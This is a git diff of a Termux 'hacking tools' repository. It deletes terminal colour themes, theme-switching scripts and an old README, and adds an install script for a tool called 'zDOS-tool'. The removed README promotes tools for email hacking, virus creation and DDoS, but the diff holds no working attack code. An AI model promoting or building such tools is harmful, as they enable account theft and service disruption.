- ------ -## Download more utility for hacking! - -#### uninstall AllHackingTools - -* `bash Uninstall/Uninstall.sh` - ------- - -#### It downloads packages and utilities and configures the utilities. - -• [Dependencies](#depencies) • [Installing](#installing) • [Options](#viewmenu) - - -## Translate - - - - -## Find Me -[![Github](https://img.shields.io/badge/Reddit-MishaKorzhik-red?style=for-the-badge&logo=reddit)](https://www.reddit.com/u/Necessary_Mammoth368?utm_medium=android_app&utm_source=share) -[![Github](https://img.shields.io/badge/GitHub-MishaKorzhik-yellow?style=for-the-badge&logo=github)](https://github.com/mishakorzik) -[![Github](https://img.shields.io/badge/Twitter-MishaKorzhik-blue?style=for-the-badge&logo=twitter)](https://twitter.com/MishaKorzhik) -[![Github](https://img.shields.io/badge/Discord-He1Zen-blue?style=for-the-badge&logo=discord)](https://discord.gg/xwpMuMYW57) - -## I recommend watching - -1.mtunn - open http, tcp ports to internet.
-2.Gmail-Hack - Easy email hacking
-3.AdminHack - Hacking bad sites
-4.Infect - Easy virus creation
-5.Free-Proxy - Lots of free proxy servers
-6.IpHack - Easy Tracking smartphones
-7.UserFinder - Find users in social
-8.Ultra-DDos - Hing ddos bad sites
- -#### Here are the repositories that I recommend you look at. below are people who liked and forked the repository - -------------- - -**Repository Views** ![Views](https://profile-counter.glitch.me/AllHackingTools/count.svg) - ---------------------------- -

- -## Supporters -[![Stargazers repo roster for @mishakorzik/AllHackingTools](https://reporoster.com/stars/mishakorzik/AllHackingTools)](https://github.com/mishakorzik/AllHackingTools/stargazers) -[![Forkers repo roster for @mishakorzik/AllHackingTools](https://reporoster.com/forks/mishakorzik/AllHackingTools)](https://github.com/mishakorzik/AllHackingTools/members) +## 🚀 Installazione +Clona il repo e lancia lo script di setup: +```bash +git clone https://github.com/RZA-pulciz/zDOS-tool.git +cd zDOS-tool +bash install.sh diff --git a/Themes/.object/.colors.properties b/Themes/.object/.colors.properties deleted file mode 100644 index a004fed4..00000000 --- a/Themes/.object/.colors.properties +++ /dev/null @@ -1,27 +0,0 @@ -background=#171717 -foreground=#F8F8F8 -# black -color0=#171717 -color8=#38252C -# red -color1=#D81765 -color9=#FF0000 -# green -color2=#97D01A -color10=#76B639 -# yellow -color3=#FFA800 -color11=#E1A126 -# blue -color4=#16B1FB -color12=#289CD5 -# magenta -color5=#FF2491 -color13=#FF2491 -# cyan -color6=#0FDCB6 -color14=#0A9B81 -# white -color7=#EBEBEB -color15=#F8F8F8 -# neon colors diff --git a/Themes/.object/.colors.properties2 b/Themes/.object/.colors.properties2 deleted file mode 100644 index a642709f..00000000 --- a/Themes/.object/.colors.properties2 +++ /dev/null @@ -1,20 +0,0 @@ -background=#212121 -foreground=#f7f7f7 -cursor=#218693 - -color0=#000000 -color1=#c75646 -color2=#8eb33b -color3=#d0b03c -color4=#4e90a7 -color5=#c8a0d1 -color6=#218693 -color7=#b0b0b0 -color9=#e09690 -color8=#5d5d5d -color10=#cdee69 -color11=#ffe377 -color12=#9cd9f0 -color13=#fbb1f9 -color14=#77dfd8 -color15=#f7f7f7 diff --git a/Themes/.object/.colors.properties3 b/Themes/.object/.colors.properties3 deleted file mode 100644 index e440cff0..00000000 --- a/Themes/.object/.colors.properties3 +++ /dev/null @@ -1,27 +0,0 @@ -foreground=#f8f8f2 -cursor=#f8f8f2 -background=#282a36 -# black -color0=#000000 -color8=#4d4d4d -# red -color1=#ff5555 -color9=#ff6e67 -# green -color2=#50fa7b -color10=#5af78e -# yellow -color3=#f1fa8c -color11=#f4f99d -# blue -color4=#caa9fa -color12=#caa9fa -# magenta -color5=#ff79c6 -color13=#ff92d0 -# cyan -color6=#8be9fd -color14=#9aedfe -# white -color7=#bfbfbf -color15=#e6e6e6 diff --git a/Themes/.object/.colors.properties4 b/Themes/.object/.colors.properties4 deleted file mode 100644 index 9b279d3e..00000000 --- a/Themes/.object/.colors.properties4 +++ /dev/null @@ -1,19 +0,0 @@ -background : #263238 -foreground : #eceff1 - -color0 : #263238 -color8 : #37474f -color1 : #ff9800 -color9 : #ffa74d -color2 : #8bc34a -color10 : #9ccc65 -color3 : #ffc107 -color11 : #ffa000 -color4 : #03a9f4 -color12 : #81d4fa -color5 : #e91e63 -color13 : #ad1457 -color6 : #009688 -color14 : #26a69a -color7 : #cfd8dc -color15 : #eceff1 diff --git a/Themes/.object/.colors.properties5 b/Themes/.object/.colors.properties5 deleted file mode 100644 index 4e040b95..00000000 --- a/Themes/.object/.colors.properties5 +++ /dev/null @@ -1,27 +0,0 @@ -foreground=#a7a7a7 -background=#1e1e1e -cursor=#a7a7a7 - -color0=#1e1e1e -color1=#cf6a4c -color2=#8f9d6a -color3=#f9ee98 -color4=#7587a6 -color5=#9b859d -color6=#afc4db -color7=#a7a7a7 -color8=#5f5a60 -color9=#cf6a4c -color10=#8f9d6a -color11=#f9ee98 -color12=#7587a6 -color13=#9b859d -color14=#afc4db -color15=#ffffff - -color16=#cda869 -color17=#9b703f -color18=#323537 -color19=#464b50 -color20=#838184 -color21=#c3c3c3 diff --git a/Themes/.object/.colors.properties6 b/Themes/.object/.colors.properties6 deleted file mode 100644 index 37644bea..00000000 --- a/Themes/.object/.colors.properties6 +++ /dev/null @@ -1,21 +0,0 @@ -foreground=#c9ccd3 -background=#263238 -cursor=#c9ccd3 - -color0=#2c393f -color1=#8bd649 -color2=#82aaff -color3=#89ddff -color4=#ea9560 -color5=#ec5f67 -color6=#ec5f67 -color7=#cdd3de - -color8=#707880 -color9=#8bd649 -color10=#82aaff -color11=#89ddff -color12=#ea9560 -color13=#ec5f67 -color14=#ffffff -color15=#d5dbe6 diff --git a/Themes/.object/.colors.properties7 b/Themes/.object/.colors.properties7 deleted file mode 100644 index 8ff54dc6..00000000 --- a/Themes/.object/.colors.properties7 +++ /dev/null @@ -1,27 +0,0 @@ -foreground=#c5c8c6 -background=#1d1f21 -cursor=#c5c8c6 - -color0=#1d1f21 -color1=#CC342B -color2=#198844 -color3=#FBA922 -color4=#3971ED -color5=#A36AC7 -color6=#3971ED -color7=#c5c8c6 -color8=#969896 -color9=#CC342B -color10=#198844 -color11=#FBA922 -color12=#3971ED -color13=#A36AC7 -color14=#3971ED -color15=#ffffff - -color16=#F96A38 -color17=#3971ED -color18=#282a2e -color19=#373b41 -color20=#b4b7b4 -color21=#e0e0e0 diff --git a/Themes/Default.sh b/Themes/Default.sh deleted file mode 100644 index 0d7d52e2..00000000 --- a/Themes/Default.sh +++ /dev/null @@ -1,7 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null - - - diff --git a/Themes/Dracula.sh b/Themes/Dracula.sh deleted file mode 100644 index c9403017..00000000 --- a/Themes/Dracula.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties3 ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/GoogleDark.sh b/Themes/GoogleDark.sh deleted file mode 100644 index 1601d0a0..00000000 --- a/Themes/GoogleDark.sh +++ /dev/null @@ -1,6 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties7 ~/.termux/colors.properties -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/Materia.sh b/Themes/Materia.sh deleted file mode 100644 index c812d341..00000000 --- a/Themes/Materia.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties6 ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/Material.sh b/Themes/Material.sh deleted file mode 100644 index 2655763a..00000000 --- a/Themes/Material.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties4 ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/Neon.sh b/Themes/Neon.sh deleted file mode 100644 index 38c4bf3d..00000000 --- a/Themes/Neon.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/Smyck.sh b/Themes/Smyck.sh deleted file mode 100644 index ee833c83..00000000 --- a/Themes/Smyck.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties2 ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/Themes/Twilight.sh b/Themes/Twilight.sh deleted file mode 100644 index 6a137fc1..00000000 --- a/Themes/Twilight.sh +++ /dev/null @@ -1,8 +0,0 @@ -cd -cd -rm -rf ~/.termux/colors.properties -rm -rf /data/data/com.termux/files/usr/etc/motd -cd ~/AllHackingTools/Themes/.object ; cp -r .colors.properties5 ~/.termux/colors.properties -tput sgr0 #reset attributes -tput op #reset color -am broadcast --user 0 -a com.termux.app.reload_style com.termux > /dev/null diff --git a/fix.sh b/fix.sh deleted file mode 100644 index 6d9752ea..00000000 --- a/fix.sh +++ /dev/null @@ -1,7 +0,0 @@ -cd -cd -cd AllHackingTools -cd Tool -chmod +x * -cp * /data/data/com.termux/files/usr/bin -cd diff --git a/install.sh b/install.sh new file mode 100755 index 00000000..dc890bc1 --- /dev/null +++ b/install.sh @@ -0,0 +1,6 @@ +#!/bin/bash +pkg update -y && pkg upgrade -y +pkg install -y git python curl openssh figlet toilet +echo "alias zdos='bash MainMenu.sh'" >> $HOME/.bashrc +source $HOME/.bashrc +echo "[*] zDOS-tool Lite installato con successo!"